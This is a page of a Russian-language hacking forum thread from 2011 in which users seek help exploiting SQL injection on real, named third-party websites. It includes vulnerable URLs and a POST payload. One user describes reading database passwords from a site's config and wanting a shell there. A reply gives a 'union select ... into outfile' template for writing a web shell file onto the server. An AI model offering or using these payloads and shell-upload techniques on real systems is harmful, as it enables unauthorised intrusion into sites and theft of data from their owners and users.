HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1775 из 2438 « Первая < 7751275167517251765 1771 1772 1773 1774 1775 1776 1777 1778 1779 1785182518752275 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #17741  
Старый 28.07.2011, 21:10
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
Цитата:
Сообщение от Expl0ited  
Expl0ited said:
php интерпретатору не удалось получить информацию о удаленном хосте
у меня какбы заходит спокойно по адресу шелла. И что делать?
 
Ответить с цитированием

  #17742  
Старый 28.07.2011, 21:32
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от Cherep  
Cherep said:
у меня какбы заходит спокойно по адресу шелла. И что делать?
Использовать поиск по форуму: /showthread.php?t=191917

И внимательно читать не только первый пост.
 
Ответить с цитированием

  #17743  
Старый 28.07.2011, 21:44
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию
Помогите раскрутить SQL inj

Уязвимая страница

Код:
Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2
POST запросом отсылаем

Код:
Code:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30
тип БД - MSSQL

Описание проблемы

Цитата:
Сообщение от None  
Там уязвимые поля имеют числовой тип в итоге чтобы туда я не писал сервер пытается сконвертить ответ в число что у него конечно не получается, вот и нашел другие параметры но в этих параметрах у меня не получается вызвать какую-либо реакцию, может быть у меня опять че-то замкнуло?
 
Ответить с цитированием

  #17744  
Старый 28.07.2011, 22:14
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию
Цитата:
Сообщение от eclipse  
eclipse said:
Помогите раскрутить SQL inj
Уязвимая страница
Код:
Code:
http://www.allyachts.ru/YachtsSearch.asp?ret=2
POST запросом отсылаем
Код:
Code:
actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=INJECTION&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30
тип БД - MSSQL
Описание проблемы
Эту скулю не раскрутить
 
Ответить с цитированием

  #17745  
Старый 28.07.2011, 23:58
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию
Цитата:
Сообщение от None  
Эту скулю не раскрутить
С чего ты взял? Аргументируй пож.
 
Ответить с цитированием

  #17746  
Старый 29.07.2011, 00:30
plaeer
Guest
Сообщений: n/a
Провел на форуме:
34360

Репутация: 1
По умолчанию
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
 
Ответить с цитированием

  #17747  
Старый 29.07.2011, 01:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от plaeer  
plaeer said:
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов

Цитата:
Сообщение от None  
*.php?id=-1 union select 'код шела или уплодера' into outfile '/путь до сайта с папкой разрешенной для заливки файлов/shell.php'+--+
 
Ответить с цитированием

  #17748  
Старый 29.07.2011, 02:13
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Кинь сайт в ПМ.
 
Ответить с цитированием

  #17749  
Старый 29.07.2011, 11:30
eternal stud
Новичок
Регистрация: 02.06.2010
Сообщений: 0
Провел на форуме:
2461

Репутация: 0
По умолчанию
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin

Заранее спасибо
 
Ответить с цитированием

  #17750  
Старый 29.07.2011, 13:36
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от eternal stud  
eternal stud said:
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start= 0&full_search=0&result_from=1&result_num=20&story= admin&dosearch=admin&titleonly=0&searchuser=\'&exa ctname=yes&replyless=0&replylimit=0&searchdate=0&b eforeafter=after&sortby=date&resorder=desc&showpos ts=0&catlist[]=0&doclear=admin
Заранее спасибо
нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.
 
Ответить с цитированием
Ответ
Страница 1775 из 2438 « Первая < 7751275167517251765 1771 1772 1773 1774 1775 1776 1777 1778 1779 1785182518752275 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ